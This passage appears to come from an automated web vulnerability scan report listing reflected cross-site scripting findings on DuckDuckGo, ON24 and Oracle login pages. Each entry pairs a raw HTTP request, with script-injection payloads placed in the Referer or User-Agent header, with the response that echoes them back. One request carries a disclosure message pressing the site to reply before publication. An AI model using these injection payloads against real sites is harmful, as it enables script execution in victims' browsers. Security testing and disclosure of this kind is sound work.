3.216. http://duckduckgo.com/c/Computing_acronyms [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/Computing_acronyms

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Computing_acronyms HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b2e4e'-alert(1)-'82df481cf11

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:49:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:49:03 GMT
Cache-Control: max-age=1
Content-Length: 26257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Computing_acronyms"/><meta http-equiv="content
...[SNIP]...
cript type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=40;r2c=0;ric=14;rq='b2e4e'-alert(1)-'82df481cf11';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.217. http://duckduckgo.com/c/Software_anomalies [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/Software_anomalies

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Software_anomalies HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=a7676'-alert(1)-'4ddb0e8f6ce

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:48:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:48:58 GMT
Cache-Control: max-age=1
Content-Length: 16344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Software_anomalies"/><meta http-equiv="content
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=28;r2c=0;ric=9;rq='a7676'-alert(1)-'4ddb0e8f6ce';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.218. http://duckduckgo.com/c/The_Simpsons_characters [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/The_Simpsons_characters

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/The_Simpsons_characters HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=c894a'-alert(1)-'54b75bb1ae9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:48:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:48:37 GMT
Cache-Control: max-age=1
Content-Length: 29088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/The_Simpsons_characters"/><meta http-equiv="co
...[SNIP]...
cript type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=43;r2c=0;ric=44;rq='c894a'-alert(1)-'54b75bb1ae9';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.219. http://duckduckgo.com/e.js [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /e.js

Request

GET /e.js HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=9b7cf"><script>alert(1)</script>141e444a1cc

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1456

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=9b7cf"><script>alert(1)</script>141e444a1cc">
...[SNIP]...

3.220. https://duckduckgo.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?q=POST+request HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=51061'-alert(1)-'cf1ebc4b3b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:56:11 GMT
Cache-Control: max-age=1
Content-Length: 7966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,nofollow"><meta http-equiv="content-type" content="text/html;
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=0;iaq=0;r1hc=0;r1c=1;r2c=0;ric=3;rq='51061'-alert(1)-'cf1ebc4b3b';rfq=1;rt='';rv='';rad='';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scri
...[SNIP]...

3.221. https://duckduckgo.com/Electronic_Frontier_Foundation [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /Electronic_Frontier_Foundation

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Electronic_Frontier_Foundation HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b1eb2'-alert(1)-'86f5e73252a

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:13 GMT
Cache-Control: max-age=1
Content-Length: 12991

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Electronic_Frontier_Foundation"/><meta http-eq
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=19;ric=5;rq='b1eb2'-alert(1)-'86f5e73252a';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.222. https://duckduckgo.com/HTTP_Secure [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /HTTP_Secure

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HTTP_Secure HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=55518'-alert(1)-'ecf4c5701fe

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:12 GMT
Cache-Control: max-age=1
Content-Length: 13106

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Secure_communication"/><meta http-equiv="conte
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=7;r2c=8;ric=13;rq='55518'-alert(1)-'ecf4c5701fe';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.223. https://duckduckgo.com/HTTP_cookie [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /HTTP_cookie

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HTTP_cookie HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=31367'-alert(1)-'39526ed110b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:10 GMT
Cache-Control: max-age=1
Content-Length: 13375

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Internet_privacy"/><meta http-equiv="content-t
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=7;r2c=7;ric=13;rq='31367'-alert(1)-'39526ed110b';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.224. https://duckduckgo.com/IP_Address [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /IP_Address

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /IP_Address HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=d4e16'-alert(1)-'40538310d83

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:12 GMT
Cache-Control: max-age=1
Content-Length: 10016

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Internet_Protocol"/><meta http-equiv="content-
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=1;r2c=8;ric=3;rq='d4e16'-alert(1)-'40538310d83';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.225. https://duckduckgo.com/e.js [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

GET /e.js HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=79b8b"><script>alert(1)</script>c5a552df2ab

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1456

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=79b8b"><script>alert(1)</script>c5a552df2ab">
...[SNIP]...

3.226. https://duckduckgo.com/e.js [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

GET /e.js?from=h02332%40gmail.com&body=Hoyt+LLC+Research+investigates+and+reports+on+security+vulnerabilities+embedded+in+Web+Applications+and+Products+used+in+wide-scale+deployment.+%0D%0A%0D%0ADisclosure+Info+%40+URI+http%3A%2F%2Fwww.cloudscan.me%2Fp%2Fhoyt-llc-research-vulnerability.html%0D%0A%0D%0AHello+-+David+Hoyt+here+with+Hoyt+LLC+Research+in+Boston%2C+MA+with+a+Private+Vuln+Report.+You%27ve+got+XSS%2C+everywhere...+everywhere..+%0D%0A%0D%0AE-mail+me+back+at+h02332%40gmail.com+quickly+if+you+don%27t+wants+this+published+at+URI+http%3A%2F%2Fxss.cx%2Fi%2Fduck.co-xss-1.jpg+and+http%3A%2F%2Fxss.cx%2Fi%2Fduckduckgo.com-xss-1.jpg%0D%0A%0D%0ABest%3B%0D%0A%0D%0ADavid%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A&copy=on&go= HTTP/1.1
Host: duckduckgo.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=79faa"><script>alert(1)</script>b50ac4e0b24b5c6ac
Cache-Control: max-age=0
Origin: http://duckduckgo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:18:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=79faa"><script>alert(1)</script>b50ac4e0b24b5c6ac">
...[SNIP]...

3.227. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=0rvu9xpQXsuNNX5uqSg34XHsQnJPAPazjTKeFaBUv5dhOISD2nsl!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
t 100%. useful to restrict content of two column reg page
middlecolumn: # of pixels for middle column. default is 4.
fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
-->
...[SNIP]...

3.228. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Request

GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~...[SNIP]...p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:27:53 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd" class="boldbodylink">
...[SNIP]...

3.229. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~...[SNIP]...
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:52 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=1997378189.25630.0000; expires=Sun, 27-Feb-2011 07:27:52 GMT; path=/
Content-Length: 8443

